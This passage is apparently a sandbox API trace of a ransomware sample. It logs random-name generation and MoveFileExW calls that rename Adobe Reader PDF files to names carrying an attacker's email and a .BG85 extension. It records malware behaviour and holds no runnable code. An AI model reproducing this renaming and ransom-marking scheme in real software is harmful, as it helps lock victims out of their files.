lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19922480727) returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0078.886] GetTickCount () returned 0x114bcbb [0078.886] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19922531758) returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0078.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0078.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0078.887] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\[BobGreen85@criptext.com].sOhAlF4d-iQCSL05Q.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\[bobgreen85@criptext.com].sohalf4d-iqcsl05q.bg85"), dwFlags=0x1) returned 1 [0079.031] GetTickCount () returned 0x114bd57 [0079.031] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19937009921) returned 1 [0079.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0079.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0079.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0079.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0079.032] GetTickCount () returned 0x114bd57 [0079.032] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19937069469) returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0079.032] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\[BobGreen85@criptext.com].TNtOlUT7-D3twKVTN.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\[bobgreen85@criptext.com].tntolut7-d3twkvtn.bg85"), dwFlags=0x1) returned 1 [0079.033] GetTickCount () returned 0x114bd57 [0079.033] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19937215235) returned 1 [0079.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0079.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0079.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0079.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0079.034] GetTickCount () returned 0x114bd57 [0079.034] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19937277475) returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0079.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\[BobGreen85@criptext.com].tYXKdkpY-davaBn8S.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\[bobgreen85@criptext.com].tyxkdkpy-davabn8s.bg85"), dwFlags=0x1) returned 1 [0079.456] GetTickCount () returned 0x114befc [0079.456] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19979527061) returned 1 [0079.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0079.457] GetTickCount () returned 0x114befc [0079.457] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19979637223) returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0079.458] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0079.458] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\[BobGreen85@criptext.com].B7U7ak2s-2Jz8SC6g.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\[bobgreen85@criptext.com].b7u7ak2s-2jz8sc6g.bg85"), dwFlags=0x1) returned 1 [0079.460] GetTickCount () returned 0x114befc [0079.460] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19979907741) returned 1 [0079.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0079.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0079.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0079.461] GetTickCount () returned 0x114befc [0079.461] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19980021577) returned 1 [0079.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0079.462] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0079.462] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\[BobGreen85@criptext.com].vfYFm1p9-eohSREcc.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\[bobgreen85@criptext.com].vfyfm1p9-eohsrecc.bg85"), dwFlags=0x1) returned 1 [0079.463] GetTickCount () returned 0x114befc [0079.463] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19980241541) returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0079.464] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0079.465] GetTickCount () returned 0x114bf0c [0079.465] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19980361891) returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0079.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0079.465] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\[BobGreen85@criptext.com].jGTXG2bT-UFbv4uX5.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\[bobgreen85@criptext.com].jgtxg2bt-ufbv4ux5.bg85"), dwFlags=0x1) returned 1 [0079.467] GetTickCount () returned 0x114bf0c [0079.467] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19980568249) returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0079.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0079.468] GetTickCount () returned 0x114bf0c [0079.468] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: 